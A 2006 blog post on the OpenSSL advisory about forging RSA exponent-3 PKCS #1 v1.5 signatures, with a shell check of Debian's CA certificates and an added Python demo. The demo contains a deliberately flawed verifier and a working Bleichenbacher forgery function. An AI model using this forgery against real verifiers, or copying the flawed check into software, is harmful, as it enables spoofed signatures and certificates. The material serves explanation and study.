
Oiwa's Comments (2006-09-05)


2006-09-05

[Security] OpenSSL Security Advisory [5th September 2006] (Part 1)

Daniel Bleichenbacher recently described an attack on PKCS #1 v1.5 signatures. If an RSA key with exponent 3 is used it may be possible to forge a PKCS #1 v1.5 signature signed by that key. Implementations may incorrectly verify the certificate if they are not checking for excess data in the RSA exponentiation result of the signature.

Whoa. The OpenSSL fix is out for now, but what about the other implementations? You could call it "a somewhat careless missed check in OpenSSL", but on the other hand it wouldn't be surprising if the same thing exists elsewhere...
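What the advisory's "checking for excess data in the RSA exponentiation result" means in practice, as an added example that is not code from this page or from OpenSSL: a toy PKCS #1 v1.5 verifier that parses the padding from the front and stops comparing after the hash, the strict verifier beside it, and Bleichenbacher's e = 3 forgery that the lax one accepts. The key size, messages, RNG seed and function names are assumptions made for the demo; the DigestInfo prefix is the fixed SHA-256 encoding from PKCS #1.

```python
# Added example, not from the original page or from OpenSSL. Demo key, messages
# and seed are constructed here; this is not a production RSA implementation.
import hashlib
import random

E = 3  # the weak public exponent the advisory is about
# DER-encoded DigestInfo prefix for SHA-256 (fixed bytes from PKCS #1 v1.5)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def is_probable_prime(n, rng, rounds=16):
    """Miller-Rabin; adequate for a demo key, not for real key generation."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits=2048, seed=20060905):
    """RSA key with e = 3; primes are 2 mod 3 so that gcd(3, p-1) = 1."""
    rng = random.Random(seed)  # constructed seed so the demo is reproducible
    primes = []
    while len(primes) < 2:
        p = rng.getrandbits(bits // 2) | (3 << (bits // 2 - 2)) | 1  # top 2 bits set
        if p % 3 == 2 and is_probable_prime(p, rng):
            primes.append(p)
    p, q = primes
    return p * q, pow(E, -1, (p - 1) * (q - 1))  # (n, d); needs Python 3.8+

def key_bytes(n):
    return (n.bit_length() + 7) // 8

def emsa_pkcs1_v15(msg, k):
    """EM = 00 01 FF..FF 00 || DigestInfo(SHA-256(msg)), exactly k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(n, d, msg):
    k = key_bytes(n)
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def recover_em(n, sig):
    """Public RSA operation s^e mod n; None if the signature is out of range."""
    s = int.from_bytes(sig, "big")
    if len(sig) != key_bytes(n) or s >= n:
        return None
    return pow(s, E, n).to_bytes(key_bytes(n), "big")

def verify_strict(n, msg, sig):
    """Correct check: rebuild the whole expected EM and compare all of it."""
    em = recover_em(n, sig)
    return em is not None and em == emsa_pkcs1_v15(msg, key_bytes(n))

def verify_lax(n, msg, sig):
    """Check of the kind the advisory describes: walk the padding from the
    front, compare DigestInfo and hash, and never look at what follows."""
    em = recover_em(n, sig)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:  # at least 8 bytes of FF, then 00
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t  # BUG: trailing bytes are ignored

def cube_root_ceil(x):
    """Smallest integer s with s**3 >= x (binary search on big integers)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo

def forge(n, msg):
    """Bleichenbacher's forgery: minimal padding and the real DigestInfo at the
    front, the rest of the block left free, then a plain integer cube root.
    No private key is used; s**3 < n, so the modulus never comes into play."""
    k = key_bytes(n)
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    free_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << free_bits
    s = cube_root_ceil(target)
    # s**3 - target < 3*s**2 + 3*s + 1 must fit in the free tail; with SHA-256
    # that holds for a 2048-bit modulus but not for a 1024-bit one.
    if (s ** 3) >> free_bits != int.from_bytes(prefix, "big"):
        raise ValueError("modulus too small for this forgery variant")
    return s.to_bytes(k, "big")

if __name__ == "__main__":
    n, d = gen_key()
    good, owner = sign(n, d, b"signed by the key owner"), b"signed by the key owner"
    print("genuine, strict:", verify_strict(n, owner, good), "lax:", verify_lax(n, owner, good))
    fake, victim = forge(n, b"forged without the key"), b"forged without the key"
    print("forged, lax:", verify_lax(n, victim, fake), "strict:", verify_strict(n, victim, fake))
```

The forged block is 00 01 FF×8 00 DigestInfo HASH followed by about 1550 bits that the forger does not control but the lax verifier never reads; the strict verifier fails because it insists on exactly 202 FF bytes and nothing after the hash. The same lax parser is also what makes the 8-FF-minimum irrelevant: the attacker picks the padding length, not the verifier.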

Since there are CAs using exponent 3 in wide use, and PKCS #1 v1.5 is used in X.509 certificates, all software that uses OpenSSL to verify X.509 certificates is potentially vulnerable, as well as any other use of PKCS #1 v1.5. This includes software that uses OpenSSL for SSL or TLS.

So it says, but honestly my reaction was "huh, normally e = 65537, isn't it?", so for a start I went looking through Debian's standard set of CA certificates for certificates with e = 3.

sh-2.05b$ for f in *.pem; do
> if openssl x509 -in $f -noout -text | grep 'Exponent..* 3 '
> then echo $f
> fi; done
                Exponent: 3 (0x3)
Digital_Signature_Trust_Co._Global_CA_1.pem
                Exponent: 3 (0x3)
Digital_Signature_Trust_Co._Global_CA_3.pem
                Exponent: 3 (0x3)
Entrust.net_Secure_Personal_CA.pem
                Exponent: 3 (0x3)
Entrust.net_Secure_Server_CA.pem

Hmm... so there were four of them... Among the ones that would have to be disabled are CAs that look fairly widely used. Here I'm just waiting for the Debian package update for now.

The mathematical details of the attack appear to be explained over at 186::Diary.


Yutaka OIWA <yutaka@oiwa.jp.nospam ... remove .nospam>

Copyright © 2005-2014 Yutaka OIWA. All rights reserved.
Posted comments and trackbacks are copyrighted by their respective posters.
